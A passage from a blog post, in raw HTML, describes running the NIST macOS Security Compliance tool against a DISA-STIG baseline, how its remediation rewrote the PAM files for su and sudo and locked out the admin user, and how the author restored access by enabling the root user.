font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Fri Oct 20 21:24:24 UTC 2023 audit_files_mode_configure passed (Result: 0, Expected: {integer: 0})</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f2f2f2; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Fri Oct 20 21:24:24 UTC 2023 audit_files_owner_configure passed (Result: 0, Expected: {integer: 0})</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f2f2f2; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Fri Oct 20 21:24:24 UTC 2023 audit_flags_aa_configure passed (Result: 1, Expected: {integer: 1})</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f2f2f2; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Fri Oct 20 21:24:25 UTC 2023 audit_flags_ad_configure passed (Result: 1, Expected: {integer: 1})</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f2f2f2; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Fri Oct 20 21:24:25 UTC 2023 audit_flags_fd_configure passed (Result: 1, Expected: {integer: 1})</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f2f2f2; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Fri Oct 20 21:24:25 UTC 2023 audit_flags_fm_configure passed (Result: 1, Expected: {integer: 1})</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f2f2f2; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Fri Oct 20 21:24:25 UTC 2023 audit_flags_fr_configure passed (Result: 1, Expected: {integer: 1})</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f2f2f2; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Fri Oct 20 21:24:25 UTC 2023 audit_flags_fw_configure passed (Result: 1, Expected: {integer: 1})</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f2f2f2; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Fri Oct 20 21:24:25 UTC 2023 audit_flags_lo_configure passed (Result: 1, Expected: {integer: 1})</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f2f2f2; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Fri Oct 20 21:24:25 UTC 2023 audit_folder_group_configure passed (Result: 0, Expected: {integer: 0})</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f2f2f2; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Fri Oct 20 21:24:25 UTC 2023 audit_folder_owner_configure passed (Result: 0, Expected: {integer: 0})</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f2f2f2; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Fri Oct 20 21:24:25 UTC 2023 audit_folders_mode_configure passed (Result: 700, Expected: {integer: 700})</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f2f2f2; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Fri Oct 20 21:24:26 UTC 2023 audit_settings_failure_notify passed (Result: 1, Expected: {integer: 1})</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f2f2f2; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Fri Oct 20 21:24:26 UTC 2023 auth_pam_login_smartcard_enforce passed (Result: 2, Expected: {integer: 2})</span></p><p class="p1" style="color: #f2f2f2; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="background-color: red; font-variant-ligatures: no-common-ligatures;">Fri Oct 20 21:24:26 UTC 2023 auth_pam_su_smartcard_enforce failed (Result: 0, Expected: {integer: 2})</span></p><p class="p1" style="color: #f2f2f2; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="background-color: red; font-variant-ligatures: no-common-ligatures;">Fri Oct 20 21:24:26 UTC 2023 auth_pam_sudo_smartcard_enforce passed (Result: 2, Expected: {integer: 2})</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span style="color: #f2f2f2;"><span style="font-variant-ligatures: no-common-ligatures;">...</span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f2f2f2; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Results written to /Library/Preferences/org.DISA-STIG.audit.plist</span></p><p class="p1" style="font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1"></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f2f2f2; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Press [Enter] key to continue...</span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><br /></span></p><p class="p1" style="font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span face="-apple-system, system-ui, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328; font-family: inherit; font-size: medium;">The red background behind the text is highlighting a couple of failures. Those failures were previously fixed when I ran the remediation script. However, when I discovered that the remediation fix had disabled my ability to use either the "sudo" or "su" commands in a terminal window. </span></p><p class="p1" style="font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span face="-apple-system, system-ui, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328; font-family: inherit; font-size: medium;"><br /></span></p><p class="p1" style="font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span face="-apple-system, system-ui, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328; font-family: inherit; font-size: medium;">If my system had the ability to use a smartcard for authentication, then this would not have been a problem. Without the ability to authenticate to use either "sudo" or "su", this was too problematic for me. When I returned to the macOS Security Compliance Tool menu, I chose to View the Last Compliance Report by typing "1" and "return". As is shown, the system is now compliant with about a third of the compliance rules:</span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span face="-apple-system, system-ui, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328; font-size: medium;"><br /></span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9t9b_SBpbPsueWsuAHjl82fe_z6caiFLuIPh0EyQEyIz6PgEtj2TlyMh2XXjnrZrIugIpHz186KTHvnqFQcDG40UOjJKtOBTOeTXybkfiBHDzvsDOPg8w-5xG3_b6gs3GEZmEqF6KIfp40e_CRlBY39CQTvHOyr79ppD7ibdUaLi3_ThlQe7ToMPaGtcU/s1274/Screen%20Shot%202023-10-20%20at%202.38.41%20PM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="822" data-original-width="1274" height="362" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9t9b_SBpbPsueWsuAHjl82fe_z6caiFLuIPh0EyQEyIz6PgEtj2TlyMh2XXjnrZrIugIpHz186KTHvnqFQcDG40UOjJKtOBTOeTXybkfiBHDzvsDOPg8w-5xG3_b6gs3GEZmEqF6KIfp40e_CRlBY39CQTvHOyr79ppD7ibdUaLi3_ThlQe7ToMPaGtcU/w563-h362/Screen%20Shot%202023-10-20%20at%202.38.41%20PM.png" width="563" /></a></div><br /><span face="-apple-system, system-ui, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328; font-size: medium;">Beware that when the remediation of non-compliant is performed, the system may change in ways that might not be acceptable, so a backup would be highly recommended. Notice the disclaimer that is shown after starting option 3 on the menu:</span><p></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span face="-apple-system, system-ui, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328; font-size: medium;"><br /></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f2f2f2; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">3. Run Commands to remediate non-compliant settings</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f2f2f2; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">4. Exit</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f2f2f2; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Enter choice [ 1 - 4 ] 3</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #9fa01c; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>THE SOFTWARE IS PROVIDED "AS IS" WITHOUT ANY WARRANTY OF ANY KIND, EITHER EXPRESSED, IMPLIED, OR STATUTORY, INCLUDING, BUT NOT LIMITED TO, ANY WARRANTY THAT THE SOFTWARE WILL CONFORM TO SPECIFICATIONS, ANY IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND FREEDOM FROM INFRINGEMENT, AND ANY WARRANTY THAT THE DOCUMENTATION WILL CONFORM TO THE SOFTWARE, OR ANY WARRANTY THAT THE SOFTWARE WILL BE ERROR FREE.<span class="Apple-converted-space"> </span>IN NO EVENT SHALL NIST BE LIABLE FOR ANY DAMAGES, INCLUDING, BUT NOT LIMITED TO, DIRECT, INDIRECT, SPECIAL OR CONSEQUENTIAL DAMAGES, ARISING OUT OF, RESULTING FROM, OR IN ANY WAY CONNECTED WITH THIS SOFTWARE, WHETHER OR NOT BASED UPON WARRANTY, CONTRACT, TORT, OR OTHERWISE, WHETHER OR NOT INJURY WAS SUSTAINED BY PERSONS OR PROPERTY OR OTHERWISE, AND WHETHER OR NOT LOSS WAS SUSTAINED FROM, OR AROSE OUT OF THE RESULTS OF, OR USE OF, THE SOFTWARE OR SERVICES PROVIDED HEREUNDER. WOULD YOU LIKE TO CONTINUE?<span class="Apple-converted-space"> </span>[y/N]<span class="Apple-converted-space"> </span></span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><br /></span></p><p class="p1" style="font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span face="-apple-system, system-ui, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328; font-family: inherit; font-size: medium;">For example, the remediation script replaced the "su" and "sudo" files in the /etc/pam.d directory, changed ownerships and permissions resulting in the lack of access to those commands for even my "admin" group user.</span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><br /></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f2f2f2; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Fri Oct 20 21:51:51 UTC 2023 Settings for: auth_pam_login_smartcard_enforce already configured, continuing...</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #9fa01c; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>auth_pam_su_smartcard_enforce - Run the command(s)-> /bin/cat > /etc/pam.d/su << SU_END</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #9fa01c; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"># su: auth account password session</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #9fa01c; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">auth<span class="Apple-converted-space"> </span>sufficient<span class="Apple-converted-space"> </span>pam_smartcard.so</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #9fa01c; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">auth<span class="Apple-converted-space"> </span>required<span class="Apple-converted-space"> </span>pam_rootok.so</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #9fa01c; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">auth<span class="Apple-converted-space"> </span>required<span class="Apple-converted-space"> </span>pam_group.so no_warn group=admin,wheel ruser root_only fail_safe</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #9fa01c; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">account <span class="Apple-converted-space"> </span>required<span class="Apple-converted-space"> </span>pam_permit.so</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #9fa01c; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">account <span class="Apple-converted-space"> </span>required<span class="Apple-converted-space"> </span>pam_opendirectory.so no_check_shell</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #9fa01c; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">password<span class="Apple-converted-space"> </span>required<span class="Apple-converted-space"> </span>pam_opendirectory.so</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #9fa01c; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">session <span class="Apple-converted-space"> </span>required<span class="Apple-converted-space"> </span>pam_launchd.so</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #9fa01c; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">SU_END</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f2f2f2; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px; min-height: 21px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span><br /></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #9fa01c; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"># Fix new file ownership and permissions</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #9fa01c; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">/bin/chmod 644 /etc/pam.d/su</span></p><p class="p1" style="font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #9fa01c; font-family: Menlo; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size: 18px; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">/usr/sbin/chown root:wheel /etc/pam.d/su<span class="Apple-converted-space"> </span>[y/N]<span class="Apple-converted-space"> </span></span></p><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: left;"><span style="font-family: inherit; font-size: medium;"><span face="-apple-system, system-ui, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328;">Before I could solve this problem with no "sudo" or "su" access for my user, I needed to have true administrative control over this system by enabling the "root" user. Fortunately, Apple does have a support article on h</span><span face="-apple-system, system-ui, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328;">ow to enable the root user or change the root password on Mac:</span></span></div><div class="separator" style="clear: both; text-align: left;"><span style="font-family: inherit; font-size: medium;"><a href=" https://support.apple.com/en-us/HT204012"><span face="-apple-system, system-ui, "Segoe UI", "Noto Sans", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"" style="background-color: white; color: #1f2328;"><br /> </span>https://support.apple.com/en-us/HT204012</a></span></div><div class="separator" style="clear: both; text-align: left;"><span style="font-family: inherit; font-size: medium;"><br /></span></div><div class="separator" style="clear: both; text-align: left;"><div class="separator" style="clear: both;"><span style="font-family: inherit; font-size: medium;">Using a user with "admin" access and the Finder application, you can enable the root user or change the root password on Mac. </span></div><div class="separator" style="clear: both;"><span style="font-family: inherit; font-size: medium;"><br /></span></div><div class="separator" style="clear: both;"><ol style="text-align: left;"><li><span style="font-family: inherit; font-size: medium;">From the Finder, choose Go > Go to Folder: </span></li><li><span style="font-family: inherit; font-size: medium;">Type in the path /System/Library/CoreServices/Applications/ and press return.</span></li><li><span style="font-family: inherit; font-size: medium;">Double-click the Directory Utility.</span></li><li><span style="font-family: inherit; font-size: medium;">To enable the root user, choose Edit > Enable Root User from the menu bar. Then enter the password that you want to use. You can then log out and log in as the root user.</span></li></ol></div><div><span style="font-family: inherit; font-size: medium;">After logging in the "su" and "sudo" files in /etc/pam.d directory were both modified from the state they were in pam.d after the remediation, to a state where the pam_group.so library would allow those commands for members of the "admin" and "wheel" groups as shown below: </span></div></div><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio6jsFrvPi2VcmdrLo3_k1jrfNMAiQX51bXs_OP2beZlYXw-8vNFRIyo5fEw_6DlcJ2yN3TNXhwla6ETakkO4myDsGni1LwFDmrcceCgnSePO85rqk3ZN86krXrt_mPtsDCpRKFEd4mJZVwpWGztLkWEAqMIBRIzAibkL3i4G9E1OVAdkqGT55EyXXdHZi/s1402/Screen%20Shot%202023-10-20%20at%201.05.35%20PM.png" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="616" data-original-width="1402" height="282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio6jsFrvPi2VcmdrLo3_k1jrfNMAiQX51bXs_OP2beZlYXw-8vNFRIyo5fEw_6DlcJ2yN3TNXhwla6ETakkO4myDsGni1LwFDmrcceCgnSePO85rqk3ZN86krXrt_mPtsDCpRKFEd4mJZVwpWGztLkWEAqMIBRIzAibkL3i4G9E1OVAdkqGT55EyXXdHZi/w639-h282/Screen%20Shot%202023-10-20%20at%201.05.35%20PM.png" width="639" 